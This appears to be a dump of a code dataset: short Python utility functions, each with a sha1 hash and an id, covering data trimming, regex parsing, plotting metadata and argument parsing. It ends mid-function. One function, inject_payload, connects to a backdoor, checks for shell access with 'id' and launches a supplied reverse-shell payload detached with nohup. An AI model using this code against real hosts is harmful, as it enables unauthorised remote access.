content
stringlengths
35
416k
sha1
stringlengths
40
40
id
int64
0
710k
def reduce_behave_data(df):
    """Trim *df* to the essential columns and shrink dtypes to reduce pkl size.

    Parameters
    ----------
    df : pandas.DataFrame
        Behavioural data containing at least the selected columns.

    Returns
    -------
    pandas.DataFrame
        New frame with boolean flags and categorical string columns.
    """
    # .copy() so the dtype assignments below never write into a view of the
    # caller's frame (avoids SettingWithCopyWarning / silent no-ops).
    df = df[
        ["type_", "class_", "response", "correct", "rt", "reward", "stim_id", "subj"]
    ].copy()
    for col in ["correct", "reward"]:
        df[col] = df[col].astype(bool)
    for col in ["type_", "class_", "response", "subj"]:
        df[col] = df[col].astype("category")
    return df
1100f792040bb9f943e6b9c7b4159a3a7f617cd2
696,972
import re
def find_serial_number(show_ver):
    """Extract the serial number from "show version" output.

    Looks for a line such as ``Processor board ID FTX1512038X`` and
    returns the trailing identifier, or an empty string when absent.
    """
    found = re.search(r"Processor board ID (.*)", show_ver)
    return found.group(1) if found else ''
37b678555caaa58c08c3629c5a1fd85bd024a862
696,973
def unique_cols(x):
    """Return positional indices of the first occurrence of each column name.

    Some taxids carry duplicate entries for the same taxonomic rank, which
    duplicates column names.  The returned indices are meant for ``iloc`` so
    that only the first column of each name survives.

    :param x: frame-like object exposing ``.columns``
    :return: list of integer column positions
    """
    seen = set()
    keep = []
    for idx, name in enumerate(x.columns):
        if name not in seen:
            seen.add(name)
            keep.append(idx)
    return keep
6d2af3bf4257f57b265c0b573ef1b5ad2d8a40e6
696,974
def get_net_adjusted_income(gross_income, salary_sacrifice):
    """Return net adjusted income: gross income minus an absolute salary sacrifice."""
    return gross_income - salary_sacrifice
e0acdd3d0f926d5268961729239b38598dc8be05
696,975
def byte_str(object):
    """Convert str -> utf-8 bytes and bytes -> str.

    For any other type the type is printed and None is returned implicitly,
    mirroring the original best-effort behaviour.
    """
    if isinstance(object, str):
        return object.encode(encoding="utf-8")
    if isinstance(object, bytes):
        return object.decode()
    print(type(object))
f84ec4e9b7932f397761296a5ef37ccd4b5e5d05
696,976
import random
import string
def random_name(N=10):
    """Return a string of N random lowercase letters and digits.

    Args:
        N: int: the number of random characters

    Returns:
        s: string: the random string with N characters
    """
    alphabet = string.ascii_lowercase + string.digits
    return "".join(random.choice(alphabet) for _ in range(N))
9f63408193f4636135ebf4689eaf81be35fa2b71
696,977
from typing import Tuple
def intersect(input_blocks: Tuple[int, int]) -> int:
    """Intersect two input blocks: air (0) if either is air, else stone (4).

    Arguments:
        input_blocks {Tuple[int, int]} -- Two input blocks

    Returns:
        int -- Intersected block
    """
    first, second = input_blocks
    return 0 if first == 0 or second == 0 else 4
f1a900d3421244b2754b2ec60fe527568fa76739
696,978
def calculate_driver_ability(calculated_data):
    """Relative driver ability for a team from its driver z-scores.

    Weighted sum: agility z-score at 0.65 and speed z-score at 0.35.

    calculated_data is the calculated data dict for the team.
    """
    weights = {'agilityZScore': 0.65, 'speedZScore': 0.35}
    return sum(calculated_data[key] * factor for key, factor in weights.items())
5ae090342635b85514b1bdda0e49ed2d507589fb
696,979
import struct
def decode_string(binary_input):
    """Decode a binary uon string.

    The first two bytes hold the little-endian length; the next *length*
    bytes are the utf-8 encoded value.

    Args:
        binary_input (bytes): a binary uon string

    Returns:
        tuple: (decoded string, remaining bytes)
    """
    (length,) = struct.unpack("<H", binary_input[0:2])
    body_end = length + 2
    (raw,) = struct.unpack(f"{length}s", binary_input[2:body_end])
    return raw.decode("utf-8"), binary_input[body_end:]
96a7857352d0530bf5ed896be1203e82b8540f5b
696,980
def url_add(**kwargs):
    """Display a box with an "add pattern" entry box and its form.

    Echoes the received keyword arguments back as a dict.
    """
    return dict(kwargs)
7b515d82c20a5372eece459de26de66a38cbb15d
696,981
def handle_es_request_error(error):
    """Map a search client error to an HTTP 400 response pair.

    (ClientError is a custom exception raised whenever the search fails
    due to client errors.)
    """
    body = str(error)
    return body, 400
b45686dcda1c11acd10283801e5dd03021fb71c1
696,982
def get_single_key_value_pair(d):
    """Get the key and value of a length-one dictionary.

    Parameters
    ----------
    d : dict
        Single element dictionary to split into key and value.

    Returns
    -------
    tuple of length 2, containing the key and value

    Examples
    --------
    >>> d = dict(key='value')
    >>> get_single_key_value_pair(d)
    ('key', 'value')
    """
    assert isinstance(d, dict), f'{d}'
    assert len(d) == 1, f'{d}'
    (pair,) = d.items()
    return pair
c4fb7a05aa74a69ebb55a867e23298748a919738
696,983
def _fconvert(value): """ Convert one tile from a number to a pentomino character """ return {523: 'U', 39: 'N', 15: 'F', 135: 'W', 23: 'P', 267: 'L', 139: 'Z', 77: 'T', 85: 'Y', 43: 'V', 33033: 'I', 29: 'X'}[value]
73900c0f76fd8ab50d92c9db049547c83ab1c5d0
696,984
def is_bad_ker(radar):
    """Kerava radar data rejection conditions (none are currently defined)."""
    rejected = False
    return rejected
d71526b11f1e48094a850a4ec400d35c48309255
696,985
def load_story_ids(filename):
    """Load a file and return its lines without trailing newlines.

    Parameters:
    -----------
    filename: string
        path to the file to load

    Returns:
    --------
    raw: list of lines (story ids)
    """
    # rstrip('\n') instead of line[:-1]: the original chopped the last
    # character of a final line that has no trailing newline.  `with`
    # guarantees the handle is closed even if iteration raises.
    with open(filename, "r") as f:
        return [line.rstrip("\n") for line in f]
a97580467da036b687fa1de4179159c113cf1d1b
696,987
import os
def checkFileExists(filePathName):
    """Check whether a file exists.

    Parameters:
        filePathName: path and name of the file to check

    return:
        original filePathName when the file exists, "" otherwise
    """
    # The original computed os.path.basename() into an unused local;
    # the check only needs isfile().
    return filePathName if os.path.isfile(filePathName) else ""
52ce7c67cae443ae36f7cc0ff8560d212c3b3054
696,988
import os
def get_base_filename(filename):
    """Strip the preceding path and the file extension from a filename.

    :param filename: Filename, possibly including path and extension.
    :return: Filename without path and without extension.
    """
    root, _ext = os.path.splitext(os.path.basename(filename))
    return root
0b2ae0f6482979f530568b631826fcd0da107eb0
696,989
def make_model_tuple(model):
    """Normalise *model* into an ("app_label", "modelname") tuple.

    Accepts an "app_label.ModelName" string, a model class/instance
    (anything exposing ``_meta``), or an already-built 2-tuple, which is
    returned unchanged.
    """
    if isinstance(model, tuple):
        model_tuple = model
    elif isinstance(model, str):
        # On Python 3, six.string_types is just `str`, so the six
        # dependency is unnecessary and has been removed.
        app_label, model_name = model.split(".")
        model_tuple = app_label, model_name.lower()
    else:
        model_tuple = model._meta.app_label, model._meta.model_name
    assert len(model_tuple) == 2, "Invalid model representation: %s" % model
    return model_tuple
250586856243d6d019a45f0dc3f1b2a5eedf5dfb
696,990
import socket
def is_live_server():
    """Detect a live server: a hostname ending in '-live' is treated as live."""
    hostname = socket.gethostname()
    return hostname.endswith('-live')
629f6bd56d53bb5e3b20169ca05433f0cc095104
696,992
import re
def format_label_name(name):
    """Strip the "[X]Vs[EverythingElse]" wrapper from a one-vs-rest label.

    Returns the inner label when the pattern matches, otherwise *name*
    unchanged.
    """
    matched = re.match("\[([A-Za-z0-9]+)\]Vs\[EverythingElse\]", name)
    return name if matched is None else matched.group(1)
7fd5769314da849810b81a23ab32fe099ed600ae
696,993
from pathlib import Path
def set_outputfile(file_pattern, target_directory, target_out_directory=None,
                   start_year=None, end_year=None):
    """Build the output .nc filename for processed Copernicus data.

    Parameters
    ----------
    file_pattern : str
        Basename prefix for the output file.
    target_directory : pathlib.Path
        Source data directory; its parent hosts the default output dir.
    target_out_directory : str or pathlib.Path, optional
        Explicit output directory; created (with parents) if missing.
    start_year, end_year : int, optional
        Year range for the filename; a single year when equal or end is unset.

    Returns
    -------
    pathlib.Path
        Full path of the output file.
    """
    if not target_out_directory:
        target_out_directory = Path(target_directory.parent,
                                    'copernicus-processed-data')
    elif isinstance(target_out_directory, str):
        # isinstance() replaces the fragile "'str' in str(type(...))" check.
        target_out_directory = Path(target_out_directory)
    if not target_out_directory.exists():
        target_out_directory.mkdir(parents=True)
    if start_year == end_year or not end_year:
        outputfile = target_out_directory / f'{file_pattern}-{start_year}.nc'
    else:
        outputfile = (target_out_directory /
                      f'{file_pattern}-{start_year}_{end_year}.nc')
    return outputfile
d3f52e95a95eb09121be7e60b5e8fc24aa356e76
696,994
def readFile(fileName):
    """Read a file, returning its contents as a single string.

    Args:
        fileName (str): The name of the file to be read.

    Returns:
        str: The contents of the file.
    """
    with open(fileName) as handle:
        return handle.read()
7292b38ac46fb60a733bffeddb9c7ee8fa600e03
696,995
def regenerate_node(arbor, node):
    """Re-create the TreeNode inside the provided *arbor*.

    Used when the arbor originally associated with the TreeNode no longer
    exists.  Roots are looked up by arbor index; non-roots are fetched
    from their root via the forest/tree id.
    """
    if node.is_root:
        return arbor[node._arbor_index]
    return node.root.get_node("forest", node.tree_id)
6c900050ed03f8dc175a7b584cba04d9519cb232
696,996
import torch
def label2one_hot_torch(labels, C=14):
    """One-hot encode an integer label tensor.

    Args:
        labels(tensor): segmentation labels
        C (integer): number of classes in labels

    Returns:
        target (tensor): float32 one-hot vector of the input label

    Shape:
        labels: (B, 1, H, W)
        target: (B, C, H, W)
    """
    batch, _, height, width = labels.shape
    canvas = torch.zeros(batch, C, height, width, dtype=torch.long).to(labels)
    # scatter_ requires a long index tensor
    one_hot = canvas.scatter_(1, labels.type(torch.long).data, 1)
    return one_hot.type(torch.float32)
f44170bc7c8a37ca1ccb9afb104c9786e11f8396
696,997
def get_shape_columns(shape):
    """Return the number of columns (``shape[1]``); 0 when absent or not indexable."""
    try:
        columns = shape[1]
    except (IndexError, TypeError):
        columns = 0
    return columns
48f5fb00248e7c51fb2c8e26e705b92d57f20d46
696,998
def formacion(soup, home_or_away):
    """Return the "formacion" (line-up) table for one side of a match.

    Args:
        soup (BeautifulSoup): Soup of the current match
        home_or_away (int): Either 1 (home team) or 0 (away team)
    """
    table_id = f'formacion{home_or_away}'
    return soup.find('table', attrs={'id': table_id})
9213eb269bbca0b5fd86ed9e5b5e43eef871dd4d
696,999
def _observables_plots(): """ Metadata for observables plots. """ def id_parts_plots(obs): return [(obs, species, dict(label=label)) for species, label in [ ('pion', '$\pi$'), ('kaon', '$K$'), ('proton', '$p$') ]] return [ dict( title='Yields', ylabel=( r'$dN_\mathrm{ch}/d\eta,\ dN/dy,\ dE_T/d\eta\ [\mathrm{GeV}]$' ), ylim=(1, 1e5), yscale='log', height_ratio=1.5, subplots=[ ('dNch_deta', None, dict(label=r'$N_\mathrm{ch}$', scale=25)), ('dET_deta', None, dict(label=r'$E_T$', scale=5)), *id_parts_plots('dN_dy') ] ), dict( title='Mean $p_T$', ylabel=r'$\langle p_T \rangle$ [GeV]', ylim=(0, 1.7), subplots=id_parts_plots('mean_pT') ), dict( title='Mean $p_T$ fluctuations', ylabel=r'$\delta p_T/\langle p_T \rangle$', ylim=(0, .04), subplots=[('pT_fluct', None, dict())] ), dict( title='Flow cumulants', ylabel=r'$v_n\{2\}$', ylim=(0, .12), subplots=[ ('vnk', (n, 2), dict(label='$v_{}$'.format(n))) for n in [2, 3, 4] ] ) ]
b2c5d89eb7d70e140afbdf7efd191372c4e47ac6
697,000
def natural_death(params, substep, state_history, prev_state):
    """Flag agents for removal when they are old or hungry enough.

    An agent is removed when its age exceeds ``params['agent_lifespan']``
    or its food stock has run out.
    """
    lifespan = params['agent_lifespan']
    doomed = [
        label
        for label, props in prev_state['agents'].items()
        if props['age'] > lifespan or props['food'] <= 0
    ]
    return {'remove_agents': doomed}
2b85c4161d20f8904485a80b847b7b6bf669dbc1
697,001
def _2D_ticks(x_num_ticks, y_num_ticks, env_config, type_): """ Generates the tick labels for the heatmap on a 2D-state environment Parameters ---------- num_ticks : int The total number of ticks along the axis env_config : dict The environment configuration file as a dict type_ : str The type of plot to get the ticks of the heatmap for, one of 'state', 'action' Returns ------- 2-tuple of func The function to generate the x tick labels and the function to generate the y tick labels """ if type_ == "state": ymin, xmin = env_config["state_low"] ymax, xmax = env_config["state_high"] else: ymin, xmin = 0.0, env_config["action_low"][0] ymax, xmax = 0.0, env_config["action_high"][0] def xtick(x, pos): if pos == 0: return "{:.2f}".format(xmin) elif pos == x_num_ticks - 1: return "{:.2f}".format(xmax) elif pos == x_num_ticks - (x_num_ticks // 2): return "{:.1f}".format((xmax + xmin) / 2) else: return "" def ytick(x, pos): if pos == 0: return "{:.2f}".format(ymin) elif pos == y_num_ticks - 1: return "{:.2f}".format(ymax) elif pos == y_num_ticks - (y_num_ticks // 2): return "{:.1f}".format((ymax + ymin) / 2) else: return "" return xtick, ytick
e0b93f06c0d8161d3464ac396b592baa1dcd965f
697,002
def _splitDate(nymd): """ Split nymd into year, month, date tuple. """ nymd = int(nymd) yy = nymd/10000 mm = (nymd - yy*10000)/100 dd = nymd - (10000*yy + 100*mm ) return (yy,mm,dd)
0dca81925f6ea4e965962cd436444c3b78e05467
697,003
def authorized_cols():
    """Initialize and return the authorized column names."""
    cols = ['one', 'two']
    return cols
df580b201b94400530f74755bb55204fd32d8101
697,004
import bisect
def get_values_greater_than(values, A):
    """From an ascendingly sorted list, return the values >= A, largest first.

    Binary search locates the cut point in O(log n), replacing the
    original right-to-left linear scan.  The inclusive comparison
    (>= A, as the doctests show — the old docstring said "> A") and the
    descending output order are preserved.

    >>> get_values_greater_than([1, 4, 9, 16, 25, 36, 49, 64, 81, 100, 121], 64)
    [121, 100, 81, 64]
    >>> get_values_greater_than([1], 1)
    [1]
    """
    cut = bisect.bisect_left(values, A)
    return list(reversed(values[cut:]))
a1599139be2823cdf05de88ef1cfdc0dd6eceb4c
697,005
import numpy
def weight(x, J, delta, sigma, z):
    """Generate a single block of the connectivity matrix.

    Gaussian falloff in (x - x.T) with width *sigma*, scaled by J + delta*z.
    """
    gaussian = numpy.exp(-(x - x.T)**2 / (2 * sigma**2))
    return gaussian * (J + delta * z)
ada874bcb3410811d576f02ce2b365d48d8e2146
697,006
def sort_twisted37(arr):
    """Sort *arr* ascending as if the digits 3 and 7 were swapped.

    Each number is ordered by the value obtained after exchanging every
    digit 3 with 7 (and vice versa), so [1..9] sorts to
    [1, 2, 7, 4, 5, 6, 3, 8, 9].

    :param arr: The array of numbers to sort
    :return: The sorted array
    :rtype: list

    NOTE(review): the original body computed helper values and always
    returned an empty list — clearly unfinished; this implements the
    intent described by its docstring.
    """
    twist = str.maketrans("37", "73")

    def twisted_value(num):
        # Compare numbers by their digit-swapped counterpart.
        return int(str(num).translate(twist))

    return sorted(arr, key=twisted_value)
d71b5d748a7e10f76b11d1946939d0f48063b3a5
697,007
def by_command(extractor, prefix=('/',), separator=' ', pass_args=False):
    """Build a key function that pulls a command out of a message.

    :param extractor:
        a function that takes one argument (the message) and returns the
        portion of the message to be interpreted; use
        ``lambda msg: msg['text']`` for chat text.
    :param prefix:
        a list of special characters expected to indicate the head of a
        command.
    :param separator:
        a command may be followed by arguments separated by ``separator``.
    :type pass_args: bool
    :param pass_args:
        If ``True``, arguments following a command will be passed to the
        handler function.
    :return:
        a key function returning the embedded command, optionally followed
        by arguments.  When the text has no recognised prefix it returns a
        1-tuple ``(None,)`` as the key, to stay distinct from the special
        ``None`` key in the routing table.
    """
    if not isinstance(prefix, (tuple, list)):
        prefix = (prefix,)

    def keyfunc(msg):
        text = extractor(msg)
        for head in prefix:
            if not text.startswith(head):
                continue
            parts = text[len(head):].split(separator)
            trailing = (parts[1:],) if pass_args else ()
            return parts[0], trailing
        return (None,),  # to distinguish with `None`

    return keyfunc
db76383bcad80be4381bb26fb65f4594576248b8
697,008
def get_filename_from_path(file_path, delimiter="/"):
    """Get the filename stem from a file path ("dir/filename.txt" -> "filename")."""
    basename = file_path.rsplit(delimiter, 1)[-1]
    return basename.partition(".")[0]
b079ce15dd44e8db314fdd5cb354e3bf2cab8471
697,009
import time
def loop(tasks=1, breaks=0, *args, **kwargs):
    """Build a runner that executes a function *tasks* times.

    :param tasks: Amount of times to loop the function.
    :param breaks: Seconds to wait after each invocation.

    The returned ``wrapper(original_func, *args, **kwargs)`` calls
    ``original_func`` immediately *tasks* times; it does not return a
    wrapped function.
    """
    def wrapper(original_func, *call_args, **call_kwargs):
        for _ in range(tasks):
            original_func(*call_args, **call_kwargs)
            time.sleep(breaks)
    return wrapper
6d682d7d980c7f17ad2ccc45c7a509b52cf23065
697,010
def add(first, second):
    """Return the sum of *first* and *second*."""
    total = first + second
    return total
2b9b604d4958579774e6c96eab2bea63506468df
697,011
import os
import csv
import gc
def read_RSEM_counts_files(geneFilePath, isoformFilePath):
    """Read the RSEM counts files into dicts.

    Parameters
    ----------
    geneFilePath, isoformFilePath : str
        Paths to the tab-separated RSEM output files.

    Returns
    -------
    tuple of dict
        (gene results, isoform results), keyed by the first column.

    Raises
    ------
    Exception
        When a file is missing or its first column is not unique.
    """
    if not os.path.exists(geneFilePath):
        raise Exception("Cannot find gene file\n%s" % (geneFilePath))
    if not os.path.exists(isoformFilePath):
        raise Exception("Cannot find isoform file\n%s" % (isoformFilePath))
    # gc stays disabled while the dicts grow (as in the original), which
    # speeds up bulk insertion of many small objects.
    gc.disable()
    try:
        results1 = _read_gene_counts(geneFilePath)
        results2 = _read_isoform_counts(isoformFilePath)
    finally:
        gc.enable()
    return results1, results2


def _read_gene_counts(path):
    """Parse one RSEM gene-level counts file into a dict keyed by gene id."""
    results = {}
    rows = 0
    # 'rU' mode was removed in Python 3.11; newline='' is the csv-module
    # recommended way to open the file.  `with` fixes the original's
    # double fid1.close() / missing fid2 close on error.
    with open(path, newline='') as handle:
        reader = csv.reader(handle, delimiter="\t")
        next(reader)  # skip header
        for row in reader:
            rows += 1
            results[row[0]] = {
                'transcript': row[1],
                'length': float(row[2]),
                'eff_length': float(row[3]),
                'exp_count': int(round(float(row[4]))),
                'TPM': float(row[5]),
                'FPKM': float(row[6]),
            }
    if rows != len(results):
        raise Exception("Rows in gene count file are not first columns unique")
    return results


def _read_isoform_counts(path):
    """Parse one RSEM isoform-level counts file into a dict keyed by isoform id."""
    results = {}
    rows = 0
    with open(path, newline='') as handle:
        reader = csv.reader(handle, delimiter="\t")
        next(reader)  # skip header
        for row in reader:
            rows += 1
            results[row[0]] = {
                'gene': row[1],
                'length': float(row[2]),
                'eff_length': float(row[3]),
                'exp_count': float(row[4]),
                'TPM': float(row[5]),
                'FPKM': float(row[6]),
            }
    if rows != len(results):
        # the original message incorrectly said "gene count file" here
        raise Exception("Rows in isoform count file are not first columns unique")
    return results
8c692b0c9089ae1eb95fbc006b97d12e1b8fefb5
697,012
import os
def list_dir_abspath(path):
    """Return a list of joined file paths for the entries of *path*.

    See mkdir_p, os.listdir.  Returns a real list (as the docstring
    promises) instead of the lazy ``map`` object the original produced
    on Python 3.
    """
    return [os.path.join(path, name) for name in os.listdir(path)]
55fc543efd4bbad63c66c5c5537a4b640d5fff56
697,013
import socket
import re
def inject_payload(conn: socket.socket, payload) -> bool:
    """Inject a payload into the backdoor connection.

    :param conn: socket object connected to backdoor
    :param payload: payload to inject (usually a reverse shell)
    :return: boolean indicating success or failure
    """
    print('Injecting payload via backdoor.')
    # Verify that we actually have a shell by asking for the user ID.
    conn.send('id\n'.encode())
    uid_data = conn.recv(1024).decode().strip()
    if not re.search(r'^uid=', uid_data):
        print(uid_data)
        return False
    uid = uid_data.split('(')[1].split(')')[0]
    print('Got shell as user {}!'.format(uid))
    # Launch the payload detached from the session on the exploited host.
    print('Injecting and running payload.')
    conn.send('nohup {} >/dev/null 2>&1\n'.format(payload).encode())
    return True
907df512f344288d076c1d1fed95aecfc016d413
697,014
def nraphson(f, df, x0, tol=1e-3, maxit=20000):
    """Newton-Raphson equation solving.

    Computes a root from the function and its derivative using
    x_n = x_{n-1} - f(x)/f'(x), stopping when the relative change drops
    below *tol* or *maxit* iterations pass.

    :param f: Function f(x) handler
    :param df: Derivative f'(x) handler
    :param x0: Initial guess
    :param tol: Tolerance
    :param maxit: Max number of iterations
    :return: [ x, it, error ]
    """
    x = 0
    previous = x0
    iterations = 0
    error = 0
    while iterations < maxit:
        iterations += 1
        x = previous - f(previous) / df(previous)
        error = abs(x - previous) / abs(previous)
        if error < tol:
            break
        previous = x
    return x, iterations, error
6256ba5e51f94ea1a35fd4e4957520348ae69d6f
697,015
def doublecomplement(i, j):
    """Return the two elements of (1, 2, 3, 4) not equal to *i* or *j*."""
    remaining = [1, 2, 3, 4]
    remaining.remove(i)
    remaining.remove(j)
    return remaining
b4bb329b320b2b8c3e7b7648914636f96394b6d7
697,016
def yr_label(yr_range):
    """Create a 'YYYY' or 'YYYY-YYYY' label of start/end years for aospy data I/O."""
    assert yr_range is not None, "yr_range is None"
    start, end = yr_range[0], yr_range[1]
    if start == end:
        return '{:04d}'.format(start)
    return '{:04d}-{:04d}'.format(*yr_range)
c453d759a23dce169593afc64846e9560d9f1cb5
697,017
def setup_with_context_manager(testcase, cm):
    """Use a context manager to setUp a test case.

    Equivalent to wrapping the whole test in ``with cm as v:``: the
    manager is entered now and its ``__exit__`` is registered as a
    cleanup, so it runs when the test finishes::

        def setUp(self):
            self.v = setup_with_context_manager(self, ctxmgr(a, b, c))

        def test_foo(self):
            # do something with self.v

    Returns the value bound by the ``as`` clause.
    """
    value = cm.__enter__()
    testcase.addCleanup(cm.__exit__, None, None, None)
    return value
e2a67d9a9600203223a220eb0a5e40c96ae6166d
697,018
def zip_with(fn, xs, ys):
    """Zip *xs* and *ys* pairwise through *fn* instead of into tuples."""
    return list(map(fn, xs, ys))
7ac086d61198262b8b355e6eacb82be364b1f6a6
697,019
import os
def simple_path(input_path, use_basename=True, max_len=50):
    """Return a shortened form of a long path for display.

    With *use_basename* (the default) only the basename is returned;
    otherwise paths longer than *max_len* are truncated from the left.
    """
    if use_basename:
        return os.path.basename(input_path)
    if len(input_path) <= max_len:
        return input_path
    tail = input_path[len(input_path) - max_len:]
    return f"[Trunked]..{tail}"
15ad6cb5a5b07bb7b5db9b2d1f6c62c45bc43517
697,020
def catch_bare_exception_sanitize_array(e):
    """Workaround check for pandas-dev/pandas#35744.

    True when *e* is an Exception carrying the 'Data must be
    1-dimensional' sanitize-array message.
    """
    if not isinstance(e, Exception):
        return False
    return 'Data must be 1-dimensional' in str(e)
c5a327ba0ba22cbbe877206635c3a089daa6f5a1
697,021
from typing import Tuple
def hosting_period_get(month: int) -> Tuple[int, int]:
    """Determine the Hosting period start days for the given month.

    In February only, Hosts begin on the 1st and 15th; in all other
    months on the 1st and 16th.
    """
    second_start = 15 if month == 2 else 16
    return (1, second_start)
77d7bc84f969b8be0f4e81ddb26d96e0d7569561
697,022
def exclude_sims_by_regex(sims, regex):
    """Remove sims matching a regular expression.

    DESCRIPTION:
        Returns all sims that do NOT match the regular expression.

    ARGS:
        sims (iterable of strings): candidate sim files
        regex (compiled pattern): e.g. re.compile(r'.+sim'), which would
            find all sim files.

    RETURNS:
        A list of strings that do not match the regular expression.
    """
    return [sim for sim in sims if regex.search(sim) is None]
e8ca8399430e7d0017e1fb621b38103eac678089
697,023
def http_date(dt):
    """Convert a datetime object into an HTTP date per RFC 1123.

    :param datetime dt: timezone-aware datetime object to convert
    :return: dt as a string according to RFC 1123 format
    :rtype: str
    """
    # Stdlib datetime.timezone.utc replaces the pytz dependency; the
    # conversion and formatting are identical.
    from datetime import timezone
    return dt.astimezone(timezone.utc).strftime('%a, %d %b %Y %H:%M:%S GMT')
20db2de2969216d201bc65227fb4b54e5c71a4c5
697,024
def get_completer_delims():
    """get_completer_delims() -> string

    Get the word delimiters for completion.  (Stub restored from
    __doc__; always returns the empty string.)
    """
    return ""
4cef2f0f98efaa4a624065c9ac60c96534b576f9
697,025
def build_telegram(name: str, message: str, title="Dr") -> str:
    """Generate a properly formatted telegram message body.

    Args:
        name: The recipient of this telegram
        message: The message to send this user
        title: The recipient's title

    Returns:
        A properly formatted string for a telegram message
    """
    STOP = " -STOP- "
    # Telegrams spell out punctuation as STOP marks.
    for symbol in (".", ",", "!"):
        message = message.replace(symbol, STOP)
    return f"ATTN {title} {name}{STOP} {message}".upper()
7d3af3b3a61a7f2f141be6f50e10199e340245d2
697,027
def train2rect(ratios, imagew, imageh):
    """Convert training-format box ratios into darknet-valid corner format.

    *ratios* holds (x-center, y-center, width, height) as fractions of the
    image size; returns pixel coordinates (xmin, ymin, xmax, ymax).
    """
    xratio, yratio, wratio, hratio = ratios
    center_x = xratio * imagew
    center_y = yratio * imageh
    half_w = wratio * imagew / 2
    half_h = hratio * imageh / 2
    return (center_x - half_w, center_y - half_h,
            center_x + half_w, center_y + half_h)
7675df2c314088d6363bf40dff1aac04b22c61bf
697,028
def is_key_complete(key):
    """Return whether *key* is complete.

    Complete keys are marked with a blank symbol at the end of the
    string and correspond to full words; incomplete keys cannot be
    mapped to word IDs.

    Args:
        key (string): The key

    Returns:
        bool. True if the last character in ``key`` is blank.
    """
    # Falsy keys (e.g. '') fall through unchanged, as in the original.
    return key and key.endswith(' ')
ecf905f973fd14f1be21b1490ad8a18988397ab9
697,029
def acknowledgements(name, tag):
    """Return acknowledgements for a space weather dataset.

    Parameters
    ----------
    name : string
        Name of space weather index, eg, dst, f107, kp
    tag : string
        Tag of the space weather index
    """
    swpc = ('Prepared by the U.S. Dept. of Commerce, NOAA, Space '
            'Weather Prediction Center')
    ackn = {'kp': {'': 'Provided by GFZ German Research Centre for Geosciences',
                   'forecast': swpc, 'recent': swpc}}
    return ackn[name][tag]
f490fe6cd4f85baad6a097b71410bb014ec0394e
697,030
def rectangleOverlap(BLx1, BLy1, TRx1, TRy1, BLx2, BLy2, TRx2, TRy2):
    """Return True if two axis-aligned rectangles overlap.

    BL: bottom left corner, TR: top right corner;
    suffix "1" is rectangle 1, "2" is rectangle 2.
    """
    # De Morgan of "not separated along either axis".
    return (TRx1 >= BLx2 and BLx1 <= TRx2 and
            TRy1 >= BLy2 and BLy1 <= TRy2)
96ea5aab6738f72587c5dd9db45598e291e68338
697,031
import itertools
def build_vocab(tokenized_src_trgs_pairs, opt):
    """Construct a vocabulary from tokenized (source, targets) pairs.

    Counts every token across sources and targets, drops the reserved
    markers if already present, and assigns ids by descending frequency
    after the four reserved ids.

    Returns:
        (word2id, id2word, vocab) where vocab maps token -> count.
    """
    vocab = {}
    for src_tokens, trgs_tokens in tokenized_src_trgs_pairs:
        for token in itertools.chain(src_tokens, *trgs_tokens):
            vocab[token] = vocab.get(token, 0) + 1
    # Reserved tokens must not compete for frequency-ranked ids.
    for reserved in ('<s>', '<pad>', '</s>', '<unk>'):
        vocab.pop(reserved, None)
    word2id = {'<pad>': 0, '<s>': 1, '</s>': 2, '<unk>': 3}
    id2word = {0: '<pad>', 1: '<s>', 2: '</s>', 3: '<unk>'}
    ranked = sorted(vocab.items(), key=lambda item: item[1], reverse=True)
    for offset, (word, _count) in enumerate(ranked):
        word2id[word] = offset + 4
        id2word[offset + 4] = word
    return word2id, id2word, vocab
67abde6882f9ef9b6f20a06447a2dae2ec4b6ad8
697,032
from typing import Tuple def _identify_missing_columns( schema_field_names: Tuple[str, ...], column_names: Tuple[str, ...], ) -> Tuple[bool, ...]: """Returns boolean mask of schema field names not in column names.""" return tuple(field_name not in column_names for field_name in schema_field_names)
c6ca296e5dd4d2271b06e5e3a21a3a8d716d76cd
697,033
import re
def get_patient_uuid(element):
    """Extract a patient's UUID from an entry's "content" node.

    The content node holds a CDATA REST path such as
    ``/openmrs/ws/rest/v1/patient/<uuid>?v=full``; the UUID portion is
    returned.

    Raises:
        ValueError: when no UUID can be found.
    """
    # "./*[local-name()='content']" matches child "content" nodes while
    # ignoring namespaces, so the feed parses whether or not the Atom
    # namespace is explicitly given.
    content = element.xpath("./*[local-name()='content']")
    pattern = re.compile(r'/patient/([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b')
    if content and len(content) == 1:
        found = pattern.search(content[0].text)
        if found:
            return found.group(1)
    raise ValueError('Patient UUID not found')
0d80313b6c7305ec72c96e29269d15718e4105da
697,034
def split_member_name(name_member):
    """Split a member name on "#" and return only the name part.

    E.g. ``"User#1234"`` -> ``"User"``.  Raises ValueError when the input
    does not contain exactly one "#".
    """
    # The original also stored the discriminator and re-assigned it to
    # itself (a no-op); only the name part is needed.
    author_name, _discriminator = name_member.split('#')
    return author_name
a492ef055b4bf68749a9d0a217d8cc21de9eb8ac
697,036
import subprocess
def execute_program(args):
    """Execute a process and wait for it to complete.

    @param args: is passed into subprocess.Popen().
    @returns a tuple of the process output (returncode, output),
        with stderr merged into stdout.
    """
    process = subprocess.Popen(args, stdout=subprocess.PIPE,
                               stderr=subprocess.STDOUT)
    captured, _ = process.communicate()
    return (process.returncode, captured)
dbf64fa8ae4d0250ab9082cc822690756a62a4e2
697,037
def read_teachers(connection):
    """Read the distinct lower-cased teacher names for result extraction.

    :param connection: open DB-API connection exposing a ``teacher`` table
    :return: list of lower-cased XMPY values
    """
    query = """SELECT DISTINCT(LOWER(XMPY)) FROM teacher"""
    cursor = connection.cursor()
    cursor.execute(query)
    return [row[0] for row in cursor.fetchall()]
3b37e454f779da2f186a96a4cdf1d1d95164037a
697,038
import argparse
def get_args():
    """Parse the command-line arguments for the vfs_stress server runner."""
    parser = argparse.ArgumentParser(description='vfs_stress Server runner')
    parser.add_argument('cluster', type=str, help='File server name or IP')
    parser.add_argument('-c', '--clients', type=str, nargs='+',
                        help="Space separated list of clients")
    parser.add_argument('-e', '--export', type=str, default="/",
                        help="NFS export name")
    parser.add_argument('--start_vip', type=str,
                        help="Start VIP address range")
    parser.add_argument('--end_vip', type=str,
                        help="End VIP address range")
    parser.add_argument('--tenants', action="store_true",
                        help="Enable MultiTenancy")
    parser.add_argument('-m', '--mtype', type=str, default='nfs3',
                        choices=['nfs3', 'nfs4', 'nfs4.1',
                                 'smb1', 'smb2', 'smb3'],
                        help='Mount type')
    parser.add_argument('-l', '--locking', type=str, help='Locking Type',
